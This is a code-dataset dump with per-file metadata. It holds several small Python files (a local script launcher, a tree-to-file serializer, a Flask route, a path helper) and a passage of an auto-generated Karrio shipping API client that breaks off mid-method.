hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
471426995eaaf7bd4a5f2aef19850f0764d972d5 | 138 | py | Python | abaqus_deploy/src/call_neuronalfem.py | miguelggaspar/neuronalFEM | 78e001b4306f39bf7e5d67361c67182a6a9b80e2 | [
"MIT"
] | null | null | null | abaqus_deploy/src/call_neuronalfem.py | miguelggaspar/neuronalFEM | 78e001b4306f39bf7e5d67361c67182a6a9b80e2 | [
"MIT"
] | null | null | null | abaqus_deploy/src/call_neuronalfem.py | miguelggaspar/neuronalFEM | 78e001b4306f39bf7e5d67361c67182a6a9b80e2 | [
"MIT"
] | null | null | null | import os
os.environ["PYTHONPATH"] = ""
os.system('python3 /home/miguel/Documents/tese/ViscoPlastic-ML/abaqus_deploy/src/neuronalfem.py')
| 34.5 | 97 | 0.782609 | 19 | 138 | 5.631579 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007634 | 0.050725 | 138 | 3 | 98 | 46 | 0.80916 | 0 | 0 | 0 | 0 | 0.333333 | 0.681159 | 0.550725 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5b4c16ba47a6769fe41622c5257fced5c723f58a | 3,774 | py | Python | project/write_to_file.py | sharan-wisc/756-project | 37388cc74018811335b95a697199eed8935e4282 | [
"Apache-2.0"
] | null | null | null | project/write_to_file.py | sharan-wisc/756-project | 37388cc74018811335b95a697199eed8935e4282 | [
"Apache-2.0"
] | null | null | null | project/write_to_file.py | sharan-wisc/756-project | 37388cc74018811335b95a697199eed8935e4282 | [
"Apache-2.0"
] | null | null | null | def write_to_file(file_name, parent_child_node, child_parent_node, node_with_sink, child_parent_wl, sink_load, delay_sink):
    # Walk the tree from the root's first child and serialize it to file_name
    node_print_left = {}
    node_print_right = {}
    node_print_left[0] = None
    node_print_right[0] = None
    write_file = open(file_name, 'w')
    # dict.keys() is not subscriptable in Python 3, so materialize it first
    parent = list(parent_child_node.keys())[1]
    (node_print_left, node_print_right) = print_left(parent, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
    return
def print_left(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink):
    # Descend along left children, opening a "( node" record for each internal node
    if node not in node_with_sink:
        write_file.write("( node")
        write_file.write(str(node))
        write_file.write("\t")
        write_file.write(str(child_parent_wl[node]))
        write_file.write("\n")
        # print >> write_file, "(node", node, "\t", child_parent_wl[node]
        node_print_left[node] = True
        node_print_right[node] = None
        node = parent_child_node[node][0]
        (node_print_left, node_print_right) = print_left(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
    else:
        # Leaf: emit the sink record, then climb back up via print_right
        write_file.write("\t< sink")
        write_file.write(str(node))
        write_file.write("\t")
        write_file.write(str(child_parent_wl[node]))
        write_file.write("\t")
        write_file.write(str(delay_sink[node]))
        write_file.write("\t")
        write_file.write(str(sink_load[node]))
        write_file.write(" >")
        write_file.write("\n")
        # print >> write_file, "\t< sink", node, "\t", child_parent_wl[node], "\t", delay_sink[node], "\t", sink_load[node], " >"
        node_print_left[node] = True
        node_print_right[node] = True
        node = child_parent_node[node]
        (node_print_left, node_print_right) = print_right(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
    return (node_print_left, node_print_right)
def print_right(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink):
    # Close brackets while climbing past fully printed subtrees
    while (node != 1) and (node in node_print_right) and node_print_right[node]:
        parent = child_parent_node[node]
        write_file.write(")\n")
        if node == parent_child_node[parent][1]:
            node_print_right[parent] = True
        node = parent
    if (node == 1) and (node in node_print_right) and node_print_right[node]:
        write_file.write(")\n")
    node = parent_child_node[node][1]
    if node not in node_with_sink:
        if (node not in node_print_left) or (node_print_left[node] != True):
            (node_print_left, node_print_right) = print_left(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
    else:
        write_file.write("\t< sink")
        write_file.write(str(node))
        write_file.write("\t")
        write_file.write(str(child_parent_wl[node]))
        write_file.write("\t")
        write_file.write(str(delay_sink[node]))
        write_file.write("\t")
        write_file.write(str(sink_load[node]))
        write_file.write(" >")
        write_file.write("\n")
        # print >> write_file, "\t< sink", node, "\t", child_parent_wl[node], "\t", delay_sink[node], "\t", sink_load[node], " >"
        node_print_left[node] = True
        node_print_right[node] = True
        parent = child_parent_node[node]
        node_print_right[parent] = True
        node = child_parent_node[node]
        (node_print_left, node_print_right) = print_right(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
    return (node_print_left, node_print_right)
| 46.02439 | 198 | 0.757287 | 615 | 3,774 | 4.219512 | 0.055285 | 0.169942 | 0.134875 | 0.12447 | 0.91869 | 0.857418 | 0.814258 | 0.779191 | 0.765318 | 0.749133 | 0 | 0.002389 | 0.112878 | 3,774 | 81 | 199 | 46.592593 | 0.7727 | 0.080286 | 0 | 0.701493 | 0 | 0 | 0.014141 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0 | 0 | 0.089552 | 0.38806 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5b7a17a18a43de86e67880ac6ecfc8cdf63d9234 | 41 | py | Python | cbox/lib/__init__.py | akashdhruv/BubbleBox | 65d0b4f740eb6a6ab984098da50f87eeb8ae3833 | [
"MIT"
] | null | null | null | cbox/lib/__init__.py | akashdhruv/BubbleBox | 65d0b4f740eb6a6ab984098da50f87eeb8ae3833 | [
"MIT"
] | 2 | 2021-11-11T05:35:58.000Z | 2022-02-13T17:00:18.000Z | cbox/lib/__init__.py | akashdhruv/BubbleBox | 65d0b4f740eb6a6ab984098da50f87eeb8ae3833 | [
"MIT"
] | null | null | null | from . import boost
from . import extern
| 13.666667 | 20 | 0.756098 | 6 | 41 | 5.166667 | 0.666667 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195122 | 41 | 2 | 21 | 20.5 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5b9095bf2e1b757bd814134e7b0c083862f4ccc8 | 44 | py | Python | src/craft_ml/utils/logger.py | OptimizationGuys/CraftML | df97e4fa5c3d85de3214e4bc41459b1f6872ba29 | [
"MIT"
] | 15 | 2021-01-31T09:19:19.000Z | 2022-01-10T11:23:00.000Z | src/craft_ml/utils/logger.py | OptimizationGuys/CraftML | df97e4fa5c3d85de3214e4bc41459b1f6872ba29 | [
"MIT"
] | 12 | 2021-01-31T18:32:15.000Z | 2021-03-08T10:11:07.000Z | src/craft_ml/utils/logger.py | OptimizationGuys/CraftML | df97e4fa5c3d85de3214e4bc41459b1f6872ba29 | [
"MIT"
] | 2 | 2021-02-18T17:36:49.000Z | 2021-05-16T10:40:31.000Z | import typing as t
class Logger:
pass
| 7.333333 | 18 | 0.681818 | 7 | 44 | 4.285714 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295455 | 44 | 5 | 19 | 8.8 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
5bbf9cdebea37fed4ae5612f476a744ab0f3c181 | 95 | py | Python | app/Http/Controllers/Home.py | y80x86ol/docs | 349accddfdcd1ae5e7cb4040c4623983ef99f65f | [
"Apache-2.0"
] | null | null | null | app/Http/Controllers/Home.py | y80x86ol/docs | 349accddfdcd1ae5e7cb4040c4623983ef99f65f | [
"Apache-2.0"
] | null | null | null | app/Http/Controllers/Home.py | y80x86ol/docs | 349accddfdcd1ae5e7cb4040c4623983ef99f65f | [
"Apache-2.0"
] | null | null | null | from flask import render_template
def index():
return render_template("home/index.html")
| 15.833333 | 45 | 0.757895 | 13 | 95 | 5.384615 | 0.769231 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 95 | 5 | 46 | 19 | 0.864198 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
f36b2ffe518d6e5b690e137676a94a9bcaf72dd6 | 123 | py | Python | netmom_check/utils/get_path.py | zommiommy/netmom_check | 3fff9e0b479d82b606b01cdf29a9a73c61fc625f | [
"MIT"
] | null | null | null | netmom_check/utils/get_path.py | zommiommy/netmom_check | 3fff9e0b479d82b606b01cdf29a9a73c61fc625f | [
"MIT"
] | null | null | null | netmom_check/utils/get_path.py | zommiommy/netmom_check | 3fff9e0b479d82b606b01cdf29a9a73c61fc625f | [
"MIT"
] | null | null | null | import os
def get_path():
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")) | 30.75 | 96 | 0.666667 | 19 | 123 | 4.052632 | 0.526316 | 0.311688 | 0.337662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 123 | 4 | 96 | 30.75 | 0.693694 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 8 |
f36dd1964b3358d5b0f10bbc0a16403c813657a9 | 46,126 | py | Python | karrio/api/proxy_api.py | karrioapi/karrio-python | 7b7e3b386016a138a5668644884a7a9fc497b15c | [
"MIT"
] | 1 | 2018-12-28T18:32:37.000Z | 2018-12-28T18:32:37.000Z | karrio/api/proxy_api.py | PurplShip/purplship-clients | 7b7e3b386016a138a5668644884a7a9fc497b15c | [
"MIT"
] | null | null | null | karrio/api/proxy_api.py | PurplShip/purplship-clients | 7b7e3b386016a138a5668644884a7a9fc497b15c | [
"MIT"
] | null | null | null | """
Karrio API
    ## API Reference Karrio is an open source multi-carrier shipping API that simplifies the integration of logistic carrier services. The Karrio API is organized around REST. Our API has predictable resource-oriented URLs, accepts JSON-encoded request bodies, returns JSON-encoded responses, and uses standard HTTP response codes, authentication, and verbs. The Karrio API differs for every account as we release new versions. These docs are customized to your version of the API. ## Versioning When backwards-incompatible changes are made to the API, a new, dated version is released. The current version is `2022.4`. Read our API changelog to learn more about backwards compatibility. As a precaution, use API versioning to check a new API version before committing to an upgrade. ## Pagination All top-level API resources have support for bulk fetches via \"list\" API methods. For instance, you can list addresses, list shipments, and list trackers. These list API methods share a common structure, taking at least these two parameters: limit, and offset. Karrio utilizes offset-based pagination via the offset and limit parameters. Both parameters take a number as value (see below) and return objects in reverse chronological order. The offset parameter returns objects listed after an index. The limit parameter takes a limit on the number of objects to be returned, from 1 to 100. ```json { \"next\": \"/v1/shipments?limit=25&offset=25\", \"previous\": \"/v1/shipments?limit=25&offset=25\", \"results\": [ ] } ``` ## Environments The Karrio API offers the possibility to create and retrieve certain objects in `test_mode`. In development, it is therefore possible to add carrier connections, get live rates, buy labels, create trackers and schedule pickups in `test_mode`. # noqa: E501
The version of the OpenAPI document: 2022.4
Contact:
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from karrio.api_client import ApiClient, Endpoint as _Endpoint
from karrio.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from karrio.model.error_response import ErrorResponse
from karrio.model.operation_response import OperationResponse
from karrio.model.pickup_cancel_request import PickupCancelRequest
from karrio.model.pickup_request import PickupRequest
from karrio.model.pickup_response import PickupResponse
from karrio.model.pickup_update_request import PickupUpdateRequest
from karrio.model.rate_request import RateRequest
from karrio.model.rate_response import RateResponse
from karrio.model.shipment_cancel_request import ShipmentCancelRequest
from karrio.model.shipping_request import ShippingRequest
from karrio.model.shipping_response import ShippingResponse
from karrio.model.tracking_response import TrackingResponse
class ProxyApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.buy_label_endpoint = _Endpoint(
settings={
'response_type': (ShippingResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/shipping',
'operation_id': 'buy_label',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'data',
],
'required': [
'data',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'data':
(ShippingRequest,),
},
'attribute_map': {
},
'location_map': {
'data': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.cancel_pickup_endpoint = _Endpoint(
settings={
'response_type': (OperationResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/pickups/{carrier_name}/cancel',
'operation_id': 'cancel_pickup',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(PickupCancelRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.fetch_rates_endpoint = _Endpoint(
settings={
'response_type': (RateResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/rates',
'operation_id': 'fetch_rates',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'data',
'test',
],
'required': [
'data',
],
'nullable': [
'test',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'data':
(RateRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'test': 'test',
},
'location_map': {
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.schedule_pickup_endpoint = _Endpoint(
settings={
'response_type': (PickupResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/pickups/{carrier_name}',
'operation_id': 'schedule_pickup',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(PickupRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.track_shipment_endpoint = _Endpoint(
settings={
'response_type': (TrackingResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/tracking/{carrier_name}/{tracking_number}',
'operation_id': 'track_shipment',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tracking_number',
'carrier_name',
'test',
],
'required': [
'tracking_number',
'carrier_name',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'tracking_number':
(str,),
'carrier_name':
(str,),
'test':
(bool, none_type,),
},
'attribute_map': {
'tracking_number': 'tracking_number',
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'tracking_number': 'path',
'carrier_name': 'path',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_pickup_endpoint = _Endpoint(
settings={
'response_type': (PickupResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/pickups/{carrier_name}',
'operation_id': 'update_pickup',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(PickupUpdateRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.void_label_endpoint = _Endpoint(
settings={
'response_type': (OperationResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/shipping/{carrier_name}/cancel',
'operation_id': 'void_label',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(ShipmentCancelRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def buy_label(
self,
data,
**kwargs
):
"""Buy a shipment label # noqa: E501
Once the shipping rates are retrieved, provide the required info to submit the shipment by specifying your preferred rate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.buy_label(data, async_req=True)
>>> result = thread.get()
Args:
data (ShippingRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ShippingResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
